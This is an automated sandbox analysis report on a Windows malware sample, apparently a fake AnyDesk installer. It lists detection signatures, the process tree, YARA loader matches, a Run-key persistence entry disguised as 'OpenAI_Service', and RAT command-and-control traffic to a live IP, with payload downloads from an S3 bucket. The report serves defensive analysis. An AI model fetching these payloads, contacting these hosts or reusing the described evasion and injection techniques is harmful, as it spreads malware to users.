Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VJQyKuHEUe.exe

Overview

General Information

Sample name:VJQyKuHEUe.exe
renamed because original name is a hash value
Original sample name:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0.exe
Analysis ID:1577406
MD5:703274fa7a3febb125ce7ea741a2d546
SHA1:557e4513056574074cb1a4070842561519136ec9
SHA256:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0
Tags:anydesk17-s3-ap-east-1-amazonaws-comexeSilverFoxuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VJQyKuHEUe.exe (PID: 1472 cmdline: "C:\Users\user\Desktop\VJQyKuHEUe.exe" MD5: 703274FA7A3FEBB125CE7EA741A2D546)
    • zfon.exe (PID: 6208 cmdline: "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 2000 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
        • WerFault.exe (PID: 6476 cmdline: C:\Windows\system32\WerFault.exe -u -p 2000 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 4160 cmdline: C:\Windows\system32\WerFault.exe -u -p 2000 -s 92 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • hh.exe (PID: 5780 cmdline: C:\windows\hh.exe MD5: 2C8FE78D53C8CA27523A71DFD2938241)
  • explorer.exe (PID: 6412 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • zfon.exe (PID: 6632 cmdline: "C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe" MD5: 44AD77338A945FE1451861B59267A68D)
      • zfon.exe (PID: 1996 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 6528 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 6160 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 1476 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 5672 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • zfon.exe (PID: 2172 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe MD5: 44AD77338A945FE1451861B59267A68D)
    • zfon.exe (PID: 5592 cmdline: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe /aut MD5: 44AD77338A945FE1451861B59267A68D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x30f3c5:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x3e9299:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
SourceRuleDescriptionAuthorStrings
0000000B.00000000.2552109850.0000000003050000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x136033:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000000B.00000002.2582901850.0000000003050000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x21f67:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000005.00000002.2529216553.000001AB8875C000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x43ebc:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000007.00000002.4591031165.000001CDCB5B0000.00000020.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2df1c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
Click to see the 4 entries
SourceRuleDescriptionAuthorStrings
6.2.zfon.exe.7ff7f96e0000.0.unpackWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x136433:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

System Summary

barindex
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 27.50.63.8, DestinationIsIpv6: false, DestinationPort: 4433, EventID: 3, Image: C:\Windows\hh.exe, Initiated: true, ProcessId: 5780, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49794
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OpenAI_Service
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T13:06:30.366027+010020528751A Network Trojan was detected192.168.2.54979427.50.63.84433TCP
2024-12-18T13:07:44.715735+010020528751A Network Trojan was detected192.168.2.54979427.50.63.84433TCP
2024-12-18T13:08:49.924265+010020528751A Network Trojan was detected192.168.2.55001227.50.63.84433TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T13:05:50.566344+010028033053Unknown Traffic192.168.2.5497143.5.237.31443TCP
2024-12-18T13:05:54.492005+010028033053Unknown Traffic192.168.2.5497153.5.238.183443TCP
2024-12-18T13:05:58.604327+010028033053Unknown Traffic192.168.2.5497223.5.238.183443TCP
2024-12-18T13:06:01.843523+010028033053Unknown Traffic192.168.2.5497313.5.239.146443TCP
2024-12-18T13:06:04.720219+010028033053Unknown Traffic192.168.2.5497433.5.239.146443TCP
2024-12-18T13:06:09.012883+010028033053Unknown Traffic192.168.2.54974952.95.161.33443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngAvira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngAvira URL Cloud: Label: malware
Source: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dllAvira URL Cloud: Label: malware
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.rawReversingLabs: Detection: 23%
Source: VJQyKuHEUe.exeReversingLabs: Detection: 34%
Source: VJQyKuHEUe.exeJoe Sandbox ML: detected

Compliance

barindex
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeUnpacked PE file: 6.2.zfon.exe.7ff7f96e0000.0.unpack
Source: unknownHTTPS traffic detected: 3.5.237.31:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: VJQyKuHEUe.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: zfon.exe, 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000006.00000002.2624943938.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001A.00000002.2822975181.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001B.00000002.2822877853.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001C.00000002.2982816689.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001D.00000002.2982816052.00007FF8A8052000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001E.00000002.3573056415.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 0000001F.00000002.3573084819.00007FF8A93A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000022.00000002.4198997991.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000023.00000002.4198930072.00007FF8B8342000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000006.00000002.2603939256.000002DC4BD60000.00000004.00001000.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2604339396.000002DC4BEC5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\code\personal\soft_distribute_tags\code\CSharpInstaller13\obj\Release\counterstand.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: q8EC:\buildworker\csgo_rel_win64\build\_build_\valve_wmf\_vpc_valve_wmf\default\win64\_msvc_\Retail\valve_wmf.pdb source: VJQyKuHEUe.exe
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000006.00000002.2627113916.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001A.00000002.2827027498.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001B.00000002.2827030579.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001C.00000002.2983306377.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001D.00000002.2983300322.00007FF8AF893000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001E.00000002.3573963734.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 0000001F.00000002.3573968038.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000022.00000002.4204868510.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000023.00000002.4202524795.00007FF8BFBA3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: zfon.exe, 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000006.00000002.2626243469.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001A.00000002.2826630254.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001B.00000002.2826626774.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001C.00000002.2983575039.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001D.00000002.2983573004.00007FF8BFB75000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001E.00000002.3573610429.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 0000001F.00000002.3573612962.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000022.00000002.4202113973.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000023.00000002.4200959181.00007FF8BFB85000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: C:\Windows\hh.exeFile opened: z:Jump to behavior
Source: C:\Windows\hh.exeFile opened: x:Jump to behavior
Source: C:\Windows\hh.exeFile opened: v:Jump to behavior
Source: C:\Windows\hh.exeFile opened: t:Jump to behavior
Source: C:\Windows\hh.exeFile opened: r:Jump to behavior
Source: C:\Windows\hh.exeFile opened: p:Jump to behavior
Source: C:\Windows\hh.exeFile opened: n:Jump to behavior
Source: C:\Windows\hh.exeFile opened: l:Jump to behavior
Source: C:\Windows\hh.exeFile opened: j:Jump to behavior
Source: C:\Windows\hh.exeFile opened: h:Jump to behavior
Source: C:\Windows\hh.exeFile opened: f:Jump to behavior
Source: C:\Windows\explorer.exeFile opened: d:Jump to behavior
Source: C:\Windows\hh.exeFile opened: b:Jump to behavior
Source: C:\Windows\hh.exeFile opened: y:Jump to behavior
Source: C:\Windows\hh.exeFile opened: w:Jump to behavior
Source: C:\Windows\hh.exeFile opened: u:Jump to behavior
Source: C:\Windows\hh.exeFile opened: s:Jump to behavior
Source: C:\Windows\hh.exeFile opened: q:Jump to behavior
Source: C:\Windows\hh.exeFile opened: o:Jump to behavior
Source: C:\Windows\hh.exeFile opened: m:Jump to behavior
Source: C:\Windows\hh.exeFile opened: k:Jump to behavior
Source: C:\Windows\hh.exeFile opened: i:Jump to behavior
Source: C:\Windows\hh.exeFile opened: g:Jump to behavior
Source: C:\Windows\hh.exeFile opened: e:Jump to behavior
Source: C:\Windows\explorer.exeFile opened: c:Jump to behavior
Source: C:\Windows\hh.exeFile opened: [:Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 5_2_00007FF8B90F0E70 FindFirstFileExW,FindClose,wcscpy_s,5_2_00007FF8B90F0E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8FF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,7_2_000001CDCB8FF350
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 26_2_00007FF8A9360E70 FindFirstFileExW,FindClose,wcscpy_s,26_2_00007FF8A9360E70
Source: C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exeCode function: 28_2_00007FF8A8010E70 FindFirstFileExW,FindClose,wcscpy_s,28_2_00007FF8A8010E70
Source: C:\Windows\hh.exeCode function: 7_2_000001CDCB8F6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetLocalTime,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,7_2_000001CDCB8F6370

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49794 -> 27.50.63.8:4433
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:50012 -> 27.50.63.8:4433
Source: global trafficTCP traffic: 192.168.2.5:49794 -> 27.50.63.8:4433
Source: global trafficHTTP traffic detected: GET /zfon.exe HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /view.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /aut.png HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /libcef.dll HTTP/1.1Host: anydesk17.s3.ap-east-1.amazonaws.com
Source: Joe Sandbox ViewIP Address: 27.50.63.8 27.50.63.8
Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 3.5.238.183:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 3.5.237.31:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 3.5.238.183:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 3.5.239.146:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 3.5.239.146:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49749 -> 52.95.161.33:443
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
Source: unknownTCP traffic detected without corresponding DNS query: 27.50.63.8
